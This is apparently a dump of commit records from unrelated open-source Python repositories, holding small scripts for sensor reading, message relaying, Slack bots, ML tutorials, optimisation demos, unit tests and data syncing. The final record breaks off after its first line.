from uwsgi import async_sleep as sleep
from swaggery.keywords import *
class TickStream(Model):
'''A stream of clock ticks.'''
schema = {
'type': 'array',
'items': {'type': 'string'}
}
class LordVetinari(Api):
'''The API of Lord Vetinari.'''
version = '1.0.0'
path = 'vetinari'
class Clock(Resource):
'''The world-famous irregular and yet accurate clock.'''
api = LordVetinari
subpath = 'ticks/<length>/<style>'
_styles = {'compact': '%H:%M:%S', 'extended': '%a, %d %b %Y %H:%M:%S'}
@operations('GET')
def ticks(
cls, request,
length: (Ptypes.path, Integer('Duration of the stream, in seconds.')),
style: (Ptypes.path, String('Tick style.', enum=['compact', 'extended']))
) -> [
(200, 'Ok', TickStream),
(400, 'Invalid parameters')
]:
'''A streaming Lord Vetinari clock...'''
try:
length = int(length)
style = cls._styles[style]
except (ValueError, KeyError):
Respond(400)
def venturi_clock():
start = time()
while time() - start <= length:
sleep(randint(25, 400) / 100)
yield strftime(style, localtime())
Respond(200, venturi_clock())
| agpl-3.0 | Python | |
eb8f749b2094d61737af496fb6e6c90bad423761 | add disk_usage.py example script | tamentis/psutil,tamentis/psutil | examples/disk_usage.py | examples/disk_usage.py | #!/usr/bin/env python
"""
List all mounted disk partitions a-la "df" command.
"""
import sys
import psutil
def convert_bytes(n):
if n == 0:
return "0B"
symbols = ('k', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i+1)*10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return '%.1f%s' % (value, s)
def main():
print "Device Total Used Free Use % Type Mount"
for part in psutil.disk_partitions(0):
usage = psutil.disk_usage(part.mountpoint)
print "%-9s %8s %8s %8s %5s%% %8s %s" % (part.device,
convert_bytes(usage.total),
convert_bytes(usage.used),
convert_bytes(usage.free),
int(usage.percent),
part.fstype,
part.mountpoint)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | Python | |
5721ec07b9a40d2f8f5e04bd2c37c1e015fb99df | add an example client, nsq_to_nsq.py | protoss-player/pynsq,svmehta/pynsq,bitly/pynsq,pombredanne/pynsq,bitly/pynsq,elubow/pynsq,nsqio/pynsq,mreiferson/pynsq,protoss-player/pynsq,goller/pynsq,virtuald/pynsq,jonmorehouse/pynsq,virtuald/pynsq,mreiferson/pynsq,jehiah/pynsq,jonmorehouse/pynsq | examples/nsq_to_nsq.py | examples/nsq_to_nsq.py | # nsq_to_nsq.py
# Written by Ryder Moody and Jehiah Czebotar.
# Slower than the golang nsq_to_nsq included with nsqd, but useful as a
# starting point for a message transforming client written in python.
import tornado.options
from nsq import Reader, run
from nsq import Writer, Error
import functools
import logging
from host_pool import HostPool
class NSQProxy:
def __init__(self, topic, nsqds):
self.topic = topic
self.writer_pool = HostPool([Writer([nsqd]) for nsqd in nsqds])
def relay(self, nsq_message):
nsq_message.enable_async()
writer = self.writer_pool.get()
callback = functools.partial(self._on_message_response, nsq_message=nsq_message, writer=writer)
writer.pub(self.topic, nsq_message.body, callback)
def _on_message_response(self, conn, data, nsq_message, writer):
if isinstance(data, Error):
logging.warning("requeuing message: %s", nsq_message.body)
self.writer_pool.failed(writer)
nsq_message.requeue()
else:
self.writer_pool.success(writer)
nsq_message.finish()
if __name__ == "__main__":
tornado.options.define('destination_topic', type=str)
tornado.options.define('topic', type=str)
tornado.options.define('nsqd_tcp_address', type=str, multiple=True)
tornado.options.define('destination_nsqd_tcp_address', type=str, multiple=True)
tornado.options.define('lookupd_http_address', type=str, multiple=True)
tornado.options.define('channel', type=str)
tornado.options.define('max_in_flight', type=int, default=500)
tornado.options.parse_command_line()
assert tornado.options.options.topic
assert tornado.options.options.destination_nsqd_tcp_address
assert tornado.options.options.channel
destination_topic = str(tornado.options.options.destination_topic or tornado.options.options.topic)
lookupd_http_addresses = map(lambda addr: 'http://' + addr, tornado.options.options.lookupd_http_address)
proxy = NSQProxy(destination_topic, tornado.options.options.destination_nsqd_tcp_address)
Reader(
topic=tornado.options.options.topic,
channel=tornado.options.options.channel,
message_handler=proxy.relay,
max_in_flight=tornado.options.options.max_in_flight,
lookupd_http_addresses=lookupd_http_addresses,
nsqd_tcp_addresses=tornado.options.options.nsqd_tcp_address,
)
run()
| mit | Python | |
39c50fe7d4713b9d0a8e4618a829d94b4fe7456c | Add code to test van der pol model | synergetics/nest_expermiments,synergetics/nest_expermiments | van_der_pol_sync.py | van_der_pol_sync.py |
from __future__ import division
import sys
import numpy as np
sys.path.append('/media/ixaxaar/Steam/src/nest/local/lib/python2.7/site-packages/')
import nest
import nest.raster_plot
import nest.voltage_trace
import uuid
import pylab
nest.SetKernelStatus({"resolution": .001})
u = uuid.uuid4()
nest.CopyModel('ac_generator', u, {'amplitude': 1., 'frequency': 20.})
ac = nest.Create(u)
n = ()
for i in xrange(1,10):
r = np.random.uniform(1000)
print r
n += nest.Create("relaxos_van_der_pol", 1, {"epsilon": r/1000, "input_currents_ex": r/1000})
d = nest.Create("spike_detector")
v = nest.Create('voltmeter', 1, {"withgid": True, "withtime": True})
# nest.Connect(ac, n, 'all_to_all', {'weight': .05, 'model': 'static_synapse'})
nest.Connect(n, n, 'all_to_all', {'weight': .1, 'model': 'static_synapse'})
nest.Connect(v, n)
nest.Simulate("1000")
nest.voltage_trace.from_device(v)
pylab.show()
| mit | Python | |
161802f87065a6b724c8c02357edf8cbb5b38f1a | Add a rosenbrock example. | lmjohns3/downhill,rodrigob/downhill | examples/rosenbrock.py | examples/rosenbrock.py | import climate
import downhill
import matplotlib.pyplot as plt
import matplotlib.animation as anim
import mpl_toolkits.mplot3d.axes3d
import numpy as np
import theano
import theano.tensor as TT
climate.enable_default_logging()
_, ax = plt.subplots(1, 1)
# run several optimizers for comparison.
for i, (algo, label, kw) in enumerate((
('sgd', 'SGD - Momentum 0', {}),
('sgd', 'SGD - Momentum 0.5', dict(momentum=0.5, nesterov=False)),
('rmsprop', 'RMSProp - Momentum 0', {}),
('rmsprop', 'RMSProp - Momentum 0.5', dict(momentum=0.5, nesterov=False)),
('adam', 'Adam - Momentum 0', {}),
#('esgd', 'ESGD - Momentum 0', {}),
('rprop', 'RProp - Momentum 0', {}),
('adadelta', 'ADADELTA - Momentum 0', {}),
)):
print(label)
x = theano.shared(np.array([-1.1, -0.4], 'f'), name='x')
opt = downhill.build(
algo,
loss=(100 * (x[1:] - x[:-1] ** 2) ** 2 + (1 - x[:-1]) ** 2).sum(),
params=[x],
inputs=[],
monitors=[('x', x[:-1].sum()), ('y', x[1:].sum())])
xs, ys = [], []
for tm, _ in opt.iteropt([[]],
max_gradient_clip=1,
min_improvement=0,
learning_rate=0.01,
patience=0,
**kw):
xs.append(tm['x'])
ys.append(tm['y'])
if len(xs) == 100:
break
ax.plot(np.array(xs), np.array(ys) + 0.05 * i,
'o-', label=label, alpha=0.3)
# make a contour plot of the rosenbrock function surface.
a = b = np.arange(-1.2, 1.2, 0.05)
X, Y = np.meshgrid(a, b)
Z = 100 * (Y - X ** 2) ** 2 + (1 - X) ** 2
ax.plot([1], [1], 'x', mew=2, color='#111111')
ax.contourf(X, Y, Z, np.logspace(0, 3, 10))
plt.legend(loc='upper left')
plt.show()
| mit | Python | |
5aca812341fa16f0d31fcf6f43f1c937a81c2141 | Create supervised.py | txt/fss17,txt/fss17,txt/fss17 | examples/supervised.py | examples/supervised.py |
""" Part 1 """
# Load data
import numpy as np
from sklearn import datasets
iris = datasets.load_iris()
iris_X = iris.data
iris_y = iris.target
print(iris.feature_names)
print(iris.target_names)
print(np.unique(iris_y))
# Visualize data
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
X = iris.data[:, :2] # we only take the first two features.
y = iris.target
x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5
y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5
# Plot the training points
plt.figure(2, figsize=(8, 6))
plt.clf()
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Set1, edgecolor='k')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())
plt.show()
# Plot the distribution in boxplot
plt.boxplot(iris.data)
plt.xlabel('Features')
plt.ylabel('Cm')
plt.show()
""" Part 2 """
# KNN Classification
# shuffle the data
np.random.seed(0)
indices = np.random.permutation(len(iris_X))
# Split iris data in train and test data
# A random permutation, to split the data randomly
iris_X_train = iris_X[indices[:-10]]
iris_y_train = iris_y[indices[:-10]]
iris_X_test = iris_X[indices[-10:]]
iris_y_test = iris_y[indices[-10:]]
# Create and fit a nearest-neighbor classifier
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier()
knn.fit(iris_X_train, iris_y_train)
# Do prediction on the test data
knn.predict(iris_X_test)
print iris_y_test
# KNN Visualization.
n_neighbors = 15
h = .02 # step size in the mesh
# Create color maps
from matplotlib.colors import ListedColormap
cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#AAAAFF'])
cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#0000FF'])
for weights in ['uniform', 'distance']:
# we create an instance of Neighbours Classifier and fit the data.
knn = KNeighborsClassifier(n_neighbors, weights=weights)
knn.fit(X, y)
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, x_max]x[y_min, y_max].
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = knn.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure()
plt.pcolormesh(xx, yy, Z, cmap=cmap_light)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold,
edgecolor='k', s=20)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.title("3-Class classification (k = %i, weights = '%s')"
% (n_neighbors, weights))
plt.show()
""" Part 3 """
from sklearn import svm
svc = svm.SVC(kernel='linear')
svc.fit(iris_X_train, iris_y_train)
svc.predict(iris_X_test)
print iris_y_test
### Your Job: get the SVC visualization for different kernels.
| bsd-3-clause | Python | |
d14130c30f776d9b10ab48c993096dce251aba28 | Add script to get list of HRS station IDs | amacd31/hydromet-toolkit,amacd31/hydromet-toolkit | get_hrs_cc_streamflow_list.py | get_hrs_cc_streamflow_list.py | import pandas as pd
from kiwis_pie import KIWIS
k = KIWIS('http://www.bom.gov.au/waterdata/services')
def get_cc_hrs_station_list(update = False):
"""
Return list of station IDs that exist in HRS and are supplied by providers that license their data under the Creative Commons license.
:param update: Flag to indicate if cached station information should be fetched from WISKI again (and saved to disk as CSV).
:type update: boolean
"""
if update:
stations = k.get_timeseries_list(parametertype_name = 'Water Course Discharge', ts_name = 'DMQaQc.Merged.DailyMean.09HR')
stations.to_csv('available_watercoursedischarge_stations.csv')
else:
stations = pd.read_csv('available_watercoursedischarge_stations.csv', index_col=0)
hrs_stations = pd.read_csv('hrs_station_list.csv', skiprows=1)
station_subset = stations.ix[stations.station_no.isin(hrs_stations.station_id)]
if update:
station_attrs = []
for i, station in station_subset.iterrows():
attrs = k.get_station_list(station_no = station.station_no, parametertype_name = 'Water Course Discharge', return_fields=['station_id','custom_attributes'])
station_attrs.append(attrs.set_index('station_id'))
station_attributes = pd.concat(station_attrs)
station_attributes.to_csv('station_attributes.csv')
else:
station_attributes = pd.read_csv('station_attributes.csv', index_col=0)
cc_providers = pd.read_csv('cc_providers.csv', skiprows=8)
station_list = station_attributes.ix[station_attributes.DATA_OWNER.isin(cc_providers.ProviderID.values)].index.values
return station_list
if __name__ == "__main__":
for station in get_cc_hrs_station_list():
print(station)
| bsd-3-clause | Python | |
cbb7fd7d31bf103e0e9c7b385926b61d42dbb8ec | add __main__ file | firemark/homework-parser | homework_parser/__main__.py | homework_parser/__main__.py | from homework_parser.file_parser import detect_plugin
from sys import argv, stdin, stdout, stderr, exit
if __name__ == "__main__":
in_format = argv[1]
out_format = argv[2]
out_plugin = detect_plugin(out_format)
if out_plugin is None:
print >> stderr, ('out-plugin %s not found' % out_format)
exit(-1)
in_plugin = detect_plugin(in_format)
if in_plugin is None:
print >> stderr, ('in-plugin %s not found' % in_format)
exit(-1)
if len(argv) == 4:
with open(argv[3]) as f:
data = in_plugin.read_from_file(f)
else:
data = in_plugin.read_from_file(stdin)
out_plugin.write_to_file(stdout, data)
| mit | Python | |
de5c4e57ccedf0b5c9897bc2046b79ac19a18a0c | add solution for Remove Duplicates from Sorted List | zhyu/leetcode,zhyu/leetcode | src/removeDuplicatesFromSortedList.py | src/removeDuplicatesFromSortedList.py | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param head, a ListNode
# @return a ListNode
def deleteDuplicates(self, head):
p1 = head
while p1:
p2 = p1.next
while p2 and p1.val == p2.val:
p2 = p2.next
p1.next = p2
p1 = p1.next
return head
| mit | Python | |
aec88e4f9cf2d9ee7f9fe876a7b884028b6c190c | Add Script to generate a container schema from DockerFile | webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile | bin/buildHierarchiqueDiagram.py | bin/buildHierarchiqueDiagram.py | #!/usr/bin/env/python
from datetime import datetime
import os
import argparse
import re
from graphviz import Digraph
PATH = os.path.dirname(os.path.abspath(__file__))
FROM_REGEX = re.compile(ur'^FROM\s+(?P<image>[^:]+)(:(?P<tag>.+))?', re.MULTILINE)
CONTAINERS = {}
def get_current_date():
import datetime
return datetime.date.today().strftime("%d.%m.%Y")
def processDockerfile(inputFile):
outputFile = os.path.splitext(inputFile)
outputFile = os.path.join(os.path.dirname(outputFile[0]),os.path.basename(outputFile[0]))
dockerImage = os.path.basename(os.path.dirname(os.path.dirname(outputFile)))
dockerTag = os.path.basename(os.path.dirname(outputFile))
with open(inputFile, 'r') as fileInput:
DockerfileContent = fileInput.read()
data = ([m.groupdict() for m in FROM_REGEX.finditer(DockerfileContent)])[0]
CONTAINERS["webdevops/%s"%dockerImage] = data.get('image')
def main(args):
dockerfilePath = os.path.abspath(args.dockerfile)
u = Digraph('webdevops', filename='webdevops.gv')
u.body.append('size="10,10"')
u.body.append(r'label = "\n\nWebdevops Containers\n at :%s"' % get_current_date() )
u.node_attr.update(color='lightblue2', style='filled', shape='box')
# Parse Docker file
for root, dirs, files in os.walk(dockerfilePath):
for file in files:
if file.endswith("Dockerfile"):
processDockerfile(os.path.join(root, file))
# Build and render graph
for image, base in CONTAINERS.items():
if "webdevops" in base:
u.edge(base, image)
else:
u.node(image)
print u.source
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d','--dockerfile' ,help='',type=str)
args = parser.parse_args()
main(args)
| mit | Python | |
77b7b4603466c390bf2dc61428c64e85f7babbb0 | create a new file test_cut_milestone.py | WheatonCS/Lexos,WheatonCS/Lexos,WheatonCS/Lexos | test/unit_test/test_cut_milestone.py | test/unit_test/test_cut_milestone.py | from lexos.processors.prepare.cutter import cut_by_milestone
class TestMileStone:
def test_milestone_regular(self):
text_content = "The bobcat slept all day.."
milestone = "bobcat"
assert cut_by_milestone(text_content, milestone) == ["The ",
" slept all day.."
]
def test_milestone_no_milestone_in_text(self):
text_content = "The bobcat slept all day."
milestone = "am"
assert cut_by_milestone(text_content, milestone) == [
"The bobcat slept all day."]
def test_milestone_longer_than_text(self):
text_content = "The bobcat slept all day."
milestone = "The cute bobcat slept all day."
assert cut_by_milestone(text_content, milestone) == [
"The bobcat slept all day."]
def test_milestone_len_zero(self):
text_content = "The bobcat slept all day."
milestone = ""
assert cut_by_milestone(text_content, milestone) == [
"The bobcat slept all day."]
def test_milestone_empty_text(self):
text_content = ""
milestone = "bobcat"
assert cut_by_milestone(text_content, milestone) == []
def test_milestone_check_case_sensative(self):
text_content = "The bobcat slept all day."
milestone = "BOBCAT"
assert cut_by_milestone(text_content, milestone) == ["The bobcat "
"slept all day."]
def test_milestone_whole_text_milestone(self):
text_content = "The bobcat slept all day."
milestone = "The bobcat slept all day."
assert cut_by_milestone(text_content, milestone) == []
| mit | Python | |
3284a384a4147857c16462c0fde6a4dec39de2b7 | Read temperature | AnaviTech/anavi-examples,AnaviTech/anavi-examples | 1-wire/ds18b20/python/ds18b20.py | 1-wire/ds18b20/python/ds18b20.py | import glob
import time
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
def read_temp_raw():
f = open(device_file, 'r')
lines = f.readlines()
f.close()
return lines
def read_temp():
lines = read_temp_raw()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = read_temp_raw()
equals_pos = lines[1].find('t=')
if -1 != equals_pos:
temp_string = lines[1][equals_pos+2:]
return float(temp_string) / 1000.0
temperatureC = read_temp()
temperatureF = temperatureC * 9.0 / 5.0 + 32.0
print("Temperature: %.2fC (%.2fF)" % (temperatureC, temperatureF))
| mit | Python | |
89a65c75ade2629e2b67a9887e27a177617dd39e | add armes | PolySlug/polyslug | armes/armes.py | armes/armes.py | class Arme(object) :
def __init__(self):
'''Caracteristiques de la classe arme'''
pass
def tirer(self, position, vecteur) :
'''cree et envoie un projectile dans une direction'''
pass | mit | Python | |
244b7a3b8d3bd32517effdd4b7bab35628a6db61 | move init db | anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects | flask_again/init_db.py | flask_again/init_db.py | from aone_app.db import init_db
init_db()
| mit | Python | |
d054178a75caecfb20a5c4989dc4e9cd7bf4a853 | add grayscale conversion test - refs #1454 | qianwenming/mapnik,garnertb/python-mapnik,Airphrame/mapnik,lightmare/mapnik,Uli1/mapnik,zerebubuth/mapnik,mapycz/python-mapnik,stefanklug/mapnik,Mappy/mapnik,rouault/mapnik,rouault/mapnik,yohanboniface/python-mapnik,pramsey/mapnik,Uli1/mapnik,kapouer/mapnik,mbrukman/mapnik,stefanklug/mapnik,mapycz/mapnik,lightmare/mapnik,mbrukman/mapnik,whuaegeanse/mapnik,rouault/mapnik,pramsey/mapnik,strk/mapnik,cjmayo/mapnik,lightmare/mapnik,mapnik/python-mapnik,naturalatlas/mapnik,pnorman/mapnik,sebastic/python-mapnik,manz/python-mapnik,pnorman/mapnik,yiqingj/work,sebastic/python-mapnik,pnorman/mapnik,sebastic/python-mapnik,jwomeara/mapnik,tomhughes/mapnik,mbrukman/mapnik,Mappy/mapnik,qianwenming/mapnik,zerebubuth/mapnik,strk/mapnik,yohanboniface/python-mapnik,tomhughes/mapnik,strk/mapnik,CartoDB/mapnik,stefanklug/mapnik,CartoDB/mapnik,mapnik/mapnik,Uli1/mapnik,strk/mapnik,yohanboniface/python-mapnik,manz/python-mapnik,zerebubuth/mapnik,qianwenming/mapnik,CartoDB/mapnik,davenquinn/python-mapnik,qianwenming/mapnik,davenquinn/python-mapnik,pramsey/mapnik,kapouer/mapnik,Airphrame/mapnik,mbrukman/mapnik,pnorman/mapnik,manz/python-mapnik,rouault/mapnik,mapnik/mapnik,naturalatlas/mapnik,tomhughes/python-mapnik,garnertb/python-mapnik,tomhughes/mapnik,tomhughes/mapnik,lightmare/mapnik,cjmayo/mapnik,yiqingj/work,Airphrame/mapnik,garnertb/python-mapnik,naturalatlas/mapnik,jwomeara/mapnik,cjmayo/mapnik,mapnik/python-mapnik,jwomeara/mapnik,kapouer/mapnik,tomhughes/python-mapnik,mapycz/python-mapnik,davenquinn/python-mapnik,Airphrame/mapnik,mapnik/mapnik,yiqingj/work,jwomeara/mapnik,yiqingj/work,whuaegeanse/mapnik,naturalatlas/mapnik,whuaegeanse/mapnik,kapouer/mapnik,stefanklug/mapnik,tomhughes/python-mapnik,whuaegeanse/mapnik,Mappy/mapnik,cjmayo/mapnik,mapycz/mapnik,Mappy/mapnik,mapnik/mapnik,mapycz/mapnik,pramsey/mapnik,qianwenming/mapnik,Uli1/mapnik,mapnik/python-mapnik | tests/python_tests/grayscale_test.py | tests/python_tests/grayscale_test.py | import mapnik
from nose.tools import *
def test_grayscale_conversion():
im = mapnik.Image(2,2)
im.background = mapnik.Color('white')
im.set_grayscale_to_alpha()
pixel = im.get_pixel(0,0)
eq_((pixel >> 24) & 0xff,255);
if __name__ == "__main__":
[eval(run)() for run in dir() if 'test_' in run]
| lgpl-2.1 | Python | |
a76d8287d5ad0b9d43c4b509b2b42eb0a7fa03a2 | Add asyncio slackbot | voidabhi/python-scripts,voidabhi/python-scripts,voidabhi/python-scripts,voidabhi/python-scripts,voidabhi/python-scripts | slackbot_asyncio.py | slackbot_asyncio.py | import asyncio
import json
import signal
import aiohttp
from config import DEBUG, TOKEN
import websockets
RUNNING = True
async def api_call(method, data=None, file=None, token=TOKEN):
"""Perform an API call to Slack.
:param method: Slack API method name.
:param type: str
:param data: Form data to be sent.
:param type: dict
:param file: file pointer to send (for files.upload).
:param type: file
:param token: OAuth2 tokn
:param type: str
"""
with aiohttp.ClientSession() as session:
form = aiohttp.FormData(data or {})
form.add_field("token", token)
if file:
form.add_field("file", file)
async with session.post('https://slack.com/api/{0}'.format(method),
data=form) as response:
assert 200 == response.status, ("{0} with {1} failed."
.format(method, data))
return await response.json()
async def producer(send, timeout=20):
"""Produce a ping message every timeout seconds."""
while RUNNING:
await asyncio.sleep(timeout)
send({"type": "ping"})
async def consumer(message):
"""Consume the message by printing it."""
message = json.loads(message)
if message.get('type') == 'message':
user_info = await api_call('users.info',
dict(user=message.get('user')))
print("{user[user][name]}: {message[text]}"
.format(user=user_info, message=message))
async def bot(get, token=TOKEN):
"""Create a bot that joins Slack."""
rtm = await api_call("rtm.start")
assert 'ok' in rtm and rtm['ok'], "Error connecting to RTM."
async with websockets.connect(rtm["url"]) as ws:
while RUNNING:
listener_task = asyncio.ensure_future(ws.recv())
producer_task = asyncio.ensure_future(get())
done, pending = await asyncio.wait(
[listener_task, producer_task],
return_when=asyncio.FIRST_COMPLETED
)
for task in pending:
task.cancel()
if listener_task in done:
message = listener_task.result()
asyncio.ensure_future(consumer(message))
if producer_task in done:
message = producer_task.result()
await ws.send(message)
def stop():
"""Gracefully stop the bot."""
global RUNNING
RUNNING = False
print("Stopping... closing connections.")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
outbox = asyncio.Queue()
loop.set_debug(DEBUG)
loop.add_signal_handler(signal.SIGINT, stop)
loop.run_until_complete(asyncio.wait((bot(outbox.get),
producer(outbox.put))))
loop.close()
| mit | Python | |
f4ed2ec503bc12fe645b6d79a330787d2dde6c8e | Bump version 0.15.0rc7 --> 0.15.0rc8 | zestyr/lbry,lbryio/lbry,zestyr/lbry,lbryio/lbry,zestyr/lbry,lbryio/lbry | lbrynet/__init__.py | lbrynet/__init__.py | import logging
__version__ = "0.15.0rc8"
version = tuple(__version__.split('.'))
logging.getLogger(__name__).addHandler(logging.NullHandler())
| import logging
__version__ = "0.15.0rc7"
version = tuple(__version__.split('.'))
logging.getLogger(__name__).addHandler(logging.NullHandler())
| mit | Python |
1f1da12d49b9aa9b28a937fdf877bb990eb0bd2a | add convenience script to sync local from test | DOAJ/doaj,DOAJ/doaj,DOAJ/doaj,DOAJ/doaj | scratchpad/sync/sync_from_remote.py | scratchpad/sync/sync_from_remote.py | import esprit
from portality.core import app
remote = esprit.raw.Connection("http://ooz.cottagelabs.com:9200", "doaj")
local = esprit.raw.Connection("http://localhost:9200", "doaj")
esprit.tasks.copy(remote, "journal", local, "journal")
esprit.tasks.copy(remote, "account", local, "account")
esprit.tasks.copy(remote, "article", local, "article")
esprit.tasks.copy(remote, "suggestion", local, "suggestion")
esprit.tasks.copy(remote, "upload", local, "upload")
esprit.tasks.copy(remote, "cache", local, "cache")
esprit.tasks.copy(remote, "toc", local, "toc")
esprit.tasks.copy(remote, "lcc", local, "lcc")
esprit.tasks.copy(remote, "article_history", local, "article_history")
esprit.tasks.copy(remote, "editor_group", local, "editor_group")
esprit.tasks.copy(remote, "news", local, "news")
esprit.tasks.copy(remote, "lock", local, "lock")
esprit.tasks.copy(remote, "bulk_reapplication", local, "bulk_reapplication")
esprit.tasks.copy(remote, "bulk_upload", local, "bulk_upload")
esprit.tasks.copy(remote, "journal_history", local, "journal_history")
| apache-2.0 | Python | |
9d7166e489b425acd64e1294236a821d76270cfc | Create letter_game_v1.1.py | hrahadiant/mini_py_project | letter_game_v1.1.py | letter_game_v1.1.py | # only guess a single letter
# only guess an alphabetic
# user can play again
# strikes max up to 7
# draw guesses letter, spaces, and strikes
import random
words = [
'cow',
'cat',
'crocodile',
'lion',
'tiger',
'mouse',
'goat',
'giraffe',
'elephant',
'dear',
'eagle',
'bear'
]
while True:
start = input("Press enter to play or q to quit ").lower()
if start == 'q':
break
secret_word = random.choice(words)
bad_guesses = []
good_guesses = []
while len(bad_guesses) < 7 and len(good_guesses) != len(list(secret_word)):
# draw the letters
for letter in secret_word:
if letter in good_guesses:
print(letter, end='')
else:
print('.', end='')
print('')
print('Strikes {}/7'.format(len(bad_guesses)))
guess = input("Guess a letter: ")
if len(guess) != 1:
print("You can only guess a single letter.")
continue
elif guess in good_guesses or guess in bad_guesses:
print("You already guess that letter.")
continue
elif not guess.isalpha():
print("You can only guess a letter.")
continue
if guess in secret_word:
good_guesses.append(guess)
if len(good_guesses) == len(list(secret_word)):
print("You win! The word was {}".format(secret_word))
break
else:
bad_guesses.append(guess)
else:
print("You lost! The secret word was {}".format(secret_word))
continue
| apache-2.0 | Python | |
e1021970c445acd8ba3acc24294611bebc63bc5a | test if weather forecast saves data in the db | SEC-i/ecoControl,SEC-i/ecoControl,SEC-i/ecoControl | server/forecasting/tests/test_weather_forecast.py | server/forecasting/tests/test_weather_forecast.py | #import unittest
from server.forecasting.forecasting.weather import WeatherForecast
from django.test import TestCase
#from server.models import Device, Sensor, SensorEntry
''''class ForecastingTest(unittest.TestCase):
def test_test(self):
cast = WeatherForecast()
'''
class ForecastingDBTest(TestCase):
def test_crawled_data_in_data(self):
pass
if __name__ == '__main__':
unittest.main()
| mit | Python | |
7f9b2cfc5605333960b20d1f0c151d966819a53b | correct SQL bug with metadata update | akrherz/idep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep,akrherz/idep,akrherz/dep,akrherz/dep,akrherz/dep,akrherz/idep,akrherz/idep | scripts/RT/flowpathlength_totals.py | scripts/RT/flowpathlength_totals.py | """Examination of erosion totals vs flowpath length"""
import pandas as pd
import os
import datetime
import multiprocessing
import sys
import numpy as np
import psycopg2
from tqdm import tqdm
from pyiem import dep as dep_utils
def find_huc12s():
"""yield a listing of huc12s with output!"""
pgconn = psycopg2.connect(database='idep', host='iemdb', user='nobody')
cursor = pgconn.cursor()
cursor.execute("""
SELECT huc_12 from huc12 WHERE scenario = %s
and states ~* 'IA'
""", (SCENARIO,))
res = []
for row in cursor:
res.append(row[0])
return res
def readfile(huc12, fn):
df = dep_utils.read_env(fn)
key = "%s_%s" % (huc12,
int(fn.split("/")[-1].split(".")[0].split("_")[1]))
df['delivery'] = df['sed_del'] / lengths[key]
df['flowpath'] = key
df['length'] = lengths[key]
return df
def do_huc12(huc12):
"""Process a huc12's worth of WEPP output files"""
basedir = "/i/%s/env/%s/%s" % (SCENARIO, huc12[:8], huc12[8:])
if not os.path.isdir(basedir):
return None, huc12, 0
frames = [readfile(huc12, basedir+"/"+f) for f in os.listdir(basedir)]
if len(frames) == 0:
return None, huc12, 0
df = pd.concat(frames)
return df, huc12, len(frames)
def compute_res(df, date, huc12, slopes, qc_precip):
"""Compute things"""
allhits = (slopes == len(df.index))
slopes = float(slopes)
return dict(date=date, huc12=huc12,
min_precip=(df.precip.min() if allhits else 0),
avg_precip=(df.precip.sum() / slopes),
max_precip=df.precip.max(),
min_loss=(df.av_det.min() if allhits else 0),
avg_loss=(df.av_det.sum() / slopes),
max_loss=df.av_det.max(),
min_runoff=(df.runoff.min() if allhits else 0),
avg_runoff=(df.runoff.sum() / slopes),
max_runoff=df.runoff.max(),
min_delivery=(df.delivery.min() if allhits else 0),
avg_delivery=(df.delivery.sum() / slopes),
max_delivery=df.delivery.max(),
qc_precip=qc_precip
)
def load_lengths():
idep = psycopg2.connect(database='idep', host='iemdb')
icursor = idep.cursor()
lengths = {}
icursor.execute("""
SELECT huc_12, fpath, ST_Length(geom) from flowpaths where
scenario = %s
""", (SCENARIO,))
for row in icursor:
lengths["%s_%s" % (row[0], row[1])] = row[2]
return lengths
if __name__ == '__main__':
# We are ready to do stuff!
# We need to keep stuff in the global namespace to keep multiprocessing
# happy, at least I think that is the reason we do this
SCENARIO = sys.argv[1]
lengths = load_lengths()
huc12s = find_huc12s()
# Begin the processing work now!
pool = multiprocessing.Pool()
for (df, huc12, slopes) in tqdm(pool.imap_unordered(do_huc12, huc12s),
total=len(huc12s),
disable=(not sys.stdout.isatty())):
if df is None:
print("ERROR: huc12 %s returned 0 data" % (huc12,))
continue
df.to_csv('dfs/%s.csv' % (huc12,))
| mit | Python | |
f7d88f43779f94dc2623e4726bd50f997104865f | add compress-the-string | zeyuanxy/hacker-rank,EdisonCodeKeeper/hacker-rank,zeyuanxy/hacker-rank,EdisonAlgorithms/HackerRank,EdisonAlgorithms/HackerRank,EdisonCodeKeeper/hacker-rank,EdisonCodeKeeper/hacker-rank,EdisonCodeKeeper/hacker-rank,zeyuanxy/hacker-rank,EdisonAlgorithms/HackerRank,EdisonAlgorithms/HackerRank,zeyuanxy/hacker-rank,EdisonAlgorithms/HackerRank,EdisonAlgorithms/HackerRank,zeyuanxy/hacker-rank,EdisonCodeKeeper/hacker-rank,EdisonCodeKeeper/hacker-rank,zeyuanxy/hacker-rank | contest/pythonist3/compress-the-string/compress-the-string.py | contest/pythonist3/compress-the-string/compress-the-string.py | # -*- coding: utf-8 -*-
